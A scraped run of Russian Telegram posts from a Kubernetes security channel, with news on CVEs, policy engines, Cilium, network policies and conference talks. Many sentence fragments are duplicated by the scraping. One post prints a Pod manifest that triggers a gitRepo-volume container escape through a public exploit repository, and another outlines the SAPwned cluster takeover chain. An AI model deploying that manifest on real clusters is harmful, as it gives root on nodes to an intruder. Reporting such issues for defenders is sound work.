"Advanced Linux Detection and Forensics Cheatsheet" - полезный систематизирующий документ по моментам связанным с обнаружением и расследованием инцидентов в
Linux. Вы определенно можете отметить как много всего есть и как много куда надо смотреть в Linux (и от этого даже может заболеть голова). В документе упоминается и ряд моментов связанных с контейнерами и K8s. Но если прям специализироваться и затачиваться под последнее, то на их специфике можно сделать много всего интересного и очень полезного. Об этом мы как раз расскажем и покажем на будущем вебинаре «Ловим злоумышленников и собираем улики в контейнерах Kubernetes».👍15🔥4❤2
Исследователь безопасности из
Чтобы сбежать из контейнера таким способом, нужно определенным образом сконфигурировать
Интересно, что данной проблеме не присвоили
Для того чтобы детальней ознакомиться с техническими подробностями уязвимостями советуем изучить статью
Google Imre Rad нашел способ побега из контейнера в Kubernetes через deprecated volumes (начиная с 1.11) – gitRepo. Для эксплуатации необходимо соблюсти три условия: поддержка gitRepo volume type, наличие git бинаря на Node и отсутствие ограничений на использование gitRepo volume type.Чтобы сбежать из контейнера таким способом, нужно определенным образом сконфигурировать
git репозиторий и выставить gitRepo в манифесте:
apiVersion: v1
kind: Pod
metadata:
name: test-pd
spec:
containers:
- image: alpine:latest
command: ["sleep","86400"]
name: test-container
volumeMounts:
- mountPath: /gitrepo
name: gitvolume
volumes:
- name: gitvolume
gitRepo:
directory: g/.git
repository: https://github.com/raesene/repopodexploit.git
revision: main
Интересно, что данной проблеме не присвоили
CVE, хотя она может привести к побегу из контейнера. Автор, обнаруживший проблему уже закинул PR, фикс стоит ожидать во всех поддерживаемых версиях.Для того чтобы детальней ознакомиться с техническими подробностями уязвимостями советуем изучить статью
Imre Rad – Sneaky write hook: git clone to root on k8s node. Также Rory McCune в статье Fun With GitRepo Volumes показал чего может добиться злоумышленник, используя данную уязвимость👍15🔥5❤1👾1
В полку
- Мутационными
- Валидационными
- Генерационными
Политики это специальные
-
-
Подробнее о проекте можно почитать тут или спросить в комментариях к данному посту и авторы проекта ответят ;)
P.S. Проект молодой, но по общению с командой планируются и
P.S.S. В Luntry уже есть интеграция с
PoliceEngine случилось пополнение и к Kyverno, OPA Gatekeeper, Kubewarden, JSPolicy присоединился Kubelatte! При этом kubelatte это отечественная разработка ребят из СберТех. Данный движок может похвастаться сразу 3 типами политик:- Мутационными
- Валидационными
- Генерационными
Политики это специальные
CRD, где сами правила можно писать с помощью двух синтаксисов:-
rego-
simples (jmespath + regexp)Подробнее о проекте можно почитать тут или спросить в комментариях к данному посту и авторы проекта ответят ;)
P.S. Проект молодой, но по общению с командой планируются и
backgroundscan, и проверка SBOM, и проверка подписи образа!P.S.S. В Luntry уже есть интеграция с
Kyverno, OPA Gatekeeper, а такими темпами и с kubelatte добавим ;)👍30🔥9🤨6❤1💩1🤡1
Стали доступны видео докладов с прошедшей конференции CloudNativeSecurityCon North America 2024. Слайды доступны на сайте конференции.
Определенно рекомендуем ознакомиться с ними.
Определенно рекомендуем ознакомиться с ними.
YouTube
CloudNativeSecurityCon North America 2024
Share your videos with friends, family, and the world
👍7🔥2❤1
Читатели нашего канала недавно поделились с нами своей статьей "Threat Detection in the K8s Environment" в которой рассказывают об опыте работы своего
В общем, очень рекомендуем для изучения (ребята молодцы!), особенно в преддверии нашего сегодняшнего вебинара «Ловим злоумышленников и собираем улики в контейнерах Kubernetes» в
P.S. Если вы написали статью или инструмент по тематике канала, то не стесняйтесь скидывать =)
SOC в Kubernetes. В статье идет речь про кастомный Tetragon и анализ Kubernetes Audit Log. К правилам/сигнатурам для Tetragon (как и ко всем правилам) есть вопросы, но вот Audit Policy (она полностью приводится в статье и ее можно взять за базу) и сценарии анализа ее результатов очень классные. Единственное, что на наш взгляд тут можно было бы добавить это сочетание использования с PolicyEngine (в статье о данном клаcсе решений ничего не говориться), чтобы предотвратить множество кейсов и не доводить их до расследования вообще.В общем, очень рекомендуем для изучения (ребята молодцы!), особенно в преддверии нашего сегодняшнего вебинара «Ловим злоумышленников и собираем улики в контейнерах Kubernetes» в
11:00, где мы покажем как, на пример, можно ловить переименования бинарей (для bypass rules) вообще без правил/сигнатур/аномалий и при этом собрать артефакты для forensic ;)P.S. Если вы написали статью или инструмент по тематике канала, то не стесняйтесь скидывать =)
Medium
Threat Detection in the K8s Environment
Discover what tools our SOC team uses to detect malicious activity on our clusters
👍23🥰6🔥4❤1
Если вы занимаетесь пентестами, то наверняка слышали о такой утилите как
Так вот ребята из
Всё это доступно в темплейтах версии
nuclei. Эта тулза является очень гибким и легко кастомизируемым vulnerability сканером, благодаря templates, которые пишутся на YAML.Так вот ребята из
ProjectDiscovery (авторы тулзы) решили пойти дальше и добавить темплейты для сканирования Kubernetes кластера:- Deployment Configurations Review
- Network Policies Enforcement
- Pod Security Standards
- Compliance and Configuration Management
- Security Contexts and Roles
- Logging and Monitoring
- Secrets Management
- Vulnerability Scanning and Patch ManagementВсё это доступно в темплейтах версии
9.9.0. Естественно их можно кастомизировать – писать кастомные проверки, compliance и прочее.🔥32❤6🥰4👍1
На нашем сайте в разделе Исследования уже стали доступны и слайды, и видеозапись вебинара "Ловим злоумышленников и собираем улики в контейнерах Kubernetes", который мы проводили вчера. Так что если вы вчера не смогли присутствовать
Там мы рассмотрели:
- способы обнаружения злоумышленника в контейнерных окружениях
- какие подходы смогут эффективно помочь в расследовании и реагировании инцидентов
- возможности Luntry, необходимые для
И отдельный таймкод на последнюю часть с
Как всегда если есть вопросы, то пишите в комментариях.
online, то уже есть возможность все изучить в записи!Там мы рассмотрели:
- способы обнаружения злоумышленника в контейнерных окружениях
- какие подходы смогут эффективно помочь в расследовании и реагировании инцидентов
- возможности Luntry, необходимые для
Incident Response И отдельный таймкод на последнюю часть с
live demo.Как всегда если есть вопросы, то пишите в комментариях.
👍17🔥8🫡1
В блоге BugHunters компании
1) acjs -
2) ctrdac - адаптер для первого проекта, чтобы можно было его использовать за пределами
Первый проект по сути аналог JSPolicy.
Второй проект это по сути OPA с интеграцией с
В связи с существующими
Google вышла статья "Securing the Container World with Policies: acjs and ctrdac", где они представляют общественности два своих инструмента:1) acjs -
PolicyEngine для Kubernetes с возможностью мутационных и валидационных политик на JavaScript.2) ctrdac - адаптер для первого проекта, чтобы можно было его использовать за пределами
Kubernetes c чистыми Docker/containerd.Первый проект по сути аналог JSPolicy.
Второй проект это по сути OPA с интеграцией с
Docker (с containerd не встречали) .В связи с существующими
PolicyEngine для Kubernetes, в сценарий использования этих инструментов там не особо верится, а вот в сценарий вне Kubernetes вполне возможно!👍9❤2🔥2
Если у вас
Уязвимость позволяет
Бага затрагивает версии
Kubernetes кластер на Windows (ну мало ли), то поспешите обновиться, ведь вышла новая CVE-2024-5321: Incorrect permissions on Windows containers logs с оценкой по CVSS – 6.1 (Medium).Уязвимость позволяет
BULTIN\Users читать логи контейнеров, а NT AUTHORITY\Authenticated Users модифицировать логи контейнеров.Бага затрагивает версии
kubelet <= 1.27.15, 1.28.11, 1.29.6, 1.30.3. Необходимые патчи уже выпущены.GitHub
CVE-2024-5321: Incorrect permissions on Windows containers logs · Issue #126161 · kubernetes/kubernetes
CVSS Rating: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N - MEDIUM (6.1) A security issue was discovered in Kubernetes clusters with Windows nodes where BUILTIN\Users may be able to read container ...
😁16🤣8👍4🔥3❤2
В одной из последних версий проекта Sigmа, обновился набор правил касающихся
В общем на заметку специалистам
Kubernetes - теперь их там стало 15. Для тех кто не в курсе что такое Sigma, то рассказываем - это Generic Signature Format for SIEM Systems со своей библиотекой правил! Можно использовать проект как по прямому назначению, так и просто подсматривая правила ;)В общем на заметку специалистам
SOC.🔥17👍6❤2😁1
Все слайды и видеозаписи докладов с конференции БеКон 2024!
Изучайте, учитесь и делайте свои контейнерные инфраструктуре безопаснее вместе с нами!
Изучайте, учитесь и делайте свои контейнерные инфраструктуре безопаснее вместе с нами!
🔥30👍10❤9🥰4❤🔥3
SAPwned: SAP AI vulnerabilities expose customers’ cloud environments and private AI artifacts – интересная статья от исследователей из
Интересно, что изначально пользователи
Но простой трюк со сменой
WIZ, в которой они описывают полную цепочку захвата Kubernetes кластера.Интересно, что изначально пользователи
SAP AI могли создавать собственные нагрузки, используя Argo Workflow, но они были строго ограничены по securityContext и сети с помощью Istio.Но простой трюк со сменой
UID на 1337 (об этом мы рассказывали тут) позволил ресерчерам обойти сетевые ограничения, насканить сеть, найти AWS token, получить пользовательские данные из S3 хранилища и захватить кластер целиком через Unauthenticated Helm Tiller.wiz.io
SAPwned: SAP AI vulnerabilities expose customers’ cloud environments and private AI artifacts | Wiz Blog
Wiz Research uncovers vulnerabilities in SAP AI Core, allowing malicious actors to take over the service and access customer data.
👍14🔥2😁2
Как-то мы спрашивали Вас про ваше отношение к публикации на данном канале вакансий связанных чисто с
Мы хорошо понимаем актуальность данной темы, высокий спрос на данных специалистов и все сложности поиска специалистов данного направления. В контексте этого настоятельно рекомендуем ознакомиться со слайдами и видеозаписью доклада "Почему защитой k8s должно заниматься целое подразделение?" от Артема Мерец с прошедшего БеКон 2024.
При этом у нас тут собрана как раз та самая целевая аудитория: кто-то только начинает делать первые шаги в данной области, кто-то уже давно защищает кластера в своих компаниях, кто-то давно занимается разворачиваем и сопровождением
Мы решили помочь компаниям в поисках таких специалистов и публиковать вакансии, направленные на специалистов по безопасности
Kubernetes security. И большинство высказалось положительно на этот счет. Мы хорошо понимаем актуальность данной темы, высокий спрос на данных специалистов и все сложности поиска специалистов данного направления. В контексте этого настоятельно рекомендуем ознакомиться со слайдами и видеозаписью доклада "Почему защитой k8s должно заниматься целое подразделение?" от Артема Мерец с прошедшего БеКон 2024.
При этом у нас тут собрана как раз та самая целевая аудитория: кто-то только начинает делать первые шаги в данной области, кто-то уже давно защищает кластера в своих компаниях, кто-то давно занимается разворачиваем и сопровождением
K8s и хочется заняться ИБ, кто-то давно работает в SOC и хочет немного сменить фокус и т.д.Мы решили помочь компаниям в поисках таких специалистов и публиковать вакансии, направленные на специалистов по безопасности
Kubernetes (это строгое ограничение). По всем вопросам можно писать контакту указанному в профиле.Telegram
k8s (in)security
Периодически компании обращаются с вопросом о возможности публиковать на данном канале вакансии связанные с `Kubernetes security`. И компаниям хочется помочь, и чтобы рекламы было минимум. Хочу узнать ваше мнение. Быть или не быть постам с вакансиями?
Нет…
Нет…
👍35
Крутой лонгрид "Attacking Pipeline".
Рассмотренные атаки:
-
-
-
-
-
-
-
-
8 типов атак с различными сценариями представлены по шагам с рекомендациями по обеспечению безопасности (и все это с понятными примерами)!Рассмотренные атаки:
-
Control of common registry-
Direct PPE (d-PPE)-
Indirect PPE (i-PPE)-
Public PPE-
Changes in repository-
Inject in Artifacts-
User/Services credentials-
Typosquatting docker registry image🔥16❤4🥰1
Авито в поиске талантливого специалиста, который возьмёт на себя лидерство в направлении безопасности
В компании выстроен зрелый процесс безопасной разработки, включающий в себя статический и динамический анализ приложений, поиск секретов и персональных данных, анализ зависимостей и множество других решений для максимально быстрого и точного обнаружения проблем.
Уже собралась крутая команда, состоящая из
Что предстоит делать?
⭐️ Строить основные процессы безопасности
⭐️ Разрабатывать и внедрять механизмы защиты от основных угроз для контейнерных сред (
⭐️ Консультировать и обучать
Почему Авито?
🔥 Классифайд №1 в мире по версии сервиса SimilarWeb
🔥 Огромная распределённая инфраструктура
🔥 Можно работать как в комфортных офисах в Москве, Санкт-Петербурге, Самаре, Казани или в коворкинге в Ереване, так и полностью удалённо
🔥 Достойная заработная плата (до 500 000 руб)
🔥 Дико флексим на team-get-together
Откликайтесь
Kubernetes.В компании выстроен зрелый процесс безопасной разработки, включающий в себя статический и динамический анализ приложений, поиск секретов и персональных данных, анализ зависимостей и множество других решений для максимально быстрого и точного обнаружения проблем.
Уже собралась крутая команда, состоящая из
AppSec, Security BP, команды разработки и для полного счастья нужен инженер по безопасности k8s.Что предстоит делать?
⭐️ Строить основные процессы безопасности
Kubernetes⭐️ Разрабатывать и внедрять механизмы защиты от основных угроз для контейнерных сред (
OWASP TOP 10 Kubernetes/Docker)⭐️ Консультировать и обучать
DevOps и администраторов по настройкам безопасностиПочему Авито?
🔥 Классифайд №1 в мире по версии сервиса SimilarWeb
🔥 Огромная распределённая инфраструктура
🔥 Можно работать как в комфортных офисах в Москве, Санкт-Петербурге, Самаре, Казани или в коворкинге в Ереване, так и полностью удалённо
🔥 Достойная заработная плата (до 500 000 руб)
🔥 Дико флексим на team-get-together
Откликайтесь
👍15👎12😁7🔥2
Классный исследователь безопасности и по совместительству подписчик нашего телеграм канала
100
Luis Toro Puig совсем недавно выступил на конференции EuskalHack с воркшопом Kubernetes Security Fundamentals. Доклад затронул, наверное, все самые базовые темы в направлении Kubernetes Security.100
must-have слайдов можно найти тут.🔥17👍8👏2
Недавно, читая нововведения в
Так вот первым поддерживать данный ресурс (обсуждение в
Напомним, что работа над этим ресурсом идет в рамках SIG Network, а именно Network Policy API Meeting в рамках KEP-2091: Add support for AdminNetworkPolicy resources.
И пока это все изучали наткнулись еще на один ресурс над которым идет работа -
P.S. Еще в документах можно встретить TenancyNetworkPolicy ;)
P.S.S. А еще
Red Hat OpenShift 4.16, наше внимание привлекло "Secure OpenShift cluster networking with Admin Network Policy". Для тех кто ранее с этим не сталкивался то речь идет о ресурсе AdminNetworkPolicy (ранее известном как GlobalNetworkPolicy), который является нативной реализацией clusterwide вариации NetworkPolicy! В Calico для этого есть кастомнный ресурс GlobalNetworkPolicy, а в Cilium есть CiliumClusterwideNetworkPolicy и в Antrea это ClusterNetworkPolicy.Так вот
OpenShift на CNI OVN-Kubernetes сталCalico и тоже самое в Cilium и в kube-ovn пока просто идут)! Также поддержка (уже как год) этого ресурса есть в Antrea!Напомним, что работа над этим ресурсом идет в рамках SIG Network, а именно Network Policy API Meeting в рамках KEP-2091: Add support for AdminNetworkPolicy resources.
И пока это все изучали наткнулись еще на один ресурс над которым идет работа -
BaselineAdminNetworkPolicy. Его идея в следующем: "An BaselineAdminNetworkPolicy (BANP) resource will help the administrators set baseline security rules that describes default connectivity for cluster workloads, which CAN be overridden by developer owned NetworkPolicies if needed."P.S. Еще в документах можно встретить TenancyNetworkPolicy ;)
P.S.S. А еще
NetworkPolicy v2 =)👍12🔥6❤3
Вышла версия
- Поддержка диапазона портов в
-
-
- Добавлена поддержка
-
-
Полный
Cilium 1.16.0 и со стороны security там достаточно изменений:- Поддержка диапазона портов в
Network Policy-
Network Policy Validation Status. С помощью kubectl describe cnp можно узнать является ли сетевая политика Cilium валидной или нет-
Control Cilium Network Policy Default Deny behavior. Благодаря параметру EnableDefaultDeny можно управлять поведением стандартной запрещающей политики.- Добавлена поддержка
CiliumCIDRGroups в egress правилах в политиках.-
Load "default" Network Policies from Filesystem. Помимо привычной раскатки политик через kubectl apply, теперь их можно подсовывать напрямую из FS.-
Support to Select Nodes as Target of Cilium Network Policies. С помощью новых селекторов ToNodes/FromNodes трафик может быть разрешен или запрещен на основе лейблов target Node.Полный
changelog можно посмотреть тут.GitHub
Release 1.16.0 · cilium/cilium
We are excited to announce the Cilium 1.16.0 release. A total of 2969 new commits have been contributed to this release by a growing community of over 750 developers and over 19300 GitHub stars! 🤩
...
...
👍14🔥3❤2
Продолжим тему сетевой безопасности. И если вам интересно куда и как развивается механизм сетевого ограничения в
- "AdminNetworkPolicy: A New Kubernetes-Native API for Comprehensive Cluster-Wide Network Security" с
-"Network Policy: The Future of Network Policy with AdminNetworkPolicy" с
Kubernetes, то вам определённо стоит ознакомится с двумя докладами от ребят что непосредственно работают над этим:- "AdminNetworkPolicy: A New Kubernetes-Native API for Comprehensive Cluster-Wide Network Security" с
Kubecon 2023 -"Network Policy: The Future of Network Policy with AdminNetworkPolicy" с
Kubecon 2024🔥9👍3❤1🥰1
Вышла третья статья из цикла
Автор кратко разбирает как работают и в чем основные преимущества и недостатки
Kubernetes Security Fundamentals и в этот раз про Authorization (первая была про API Security и о ней мы писали тут, а вторая про Authentication и почитать про неё можно тут).Автор кратко разбирает как работают и в чем основные преимущества и недостатки
Kubernetes authorization modules, а также рассказывает как устроена авторизация в других компонентах Kubernetes – Kubelet, Scheduler и Controller Manager.👍13❤2🔥1🥰1